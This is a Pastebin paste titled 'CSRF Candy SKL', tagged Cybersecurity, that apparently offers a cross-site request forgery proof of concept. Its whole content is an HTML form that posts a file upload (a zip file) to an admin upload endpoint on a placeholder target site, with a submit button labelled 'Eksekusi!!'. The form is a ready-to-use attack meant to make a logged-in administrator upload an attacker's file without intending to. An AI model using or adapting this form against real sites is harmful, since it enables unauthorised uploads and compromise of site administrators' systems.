Advertisement
ecchiexploit

CSRF Candy SKL

Apr 18th, 2023 (edited)
2,220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.21 KB | Cybersecurity | 0 0
  1. <form action='https://target.com/admin/upload.php' method='post' enctype='multipart/form-data'>
  2.     <input type='file' name='zip_file' required='true' />
  3.     <button type='submit' name='btn_zip'>Eksekusi!!</button>
  4. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement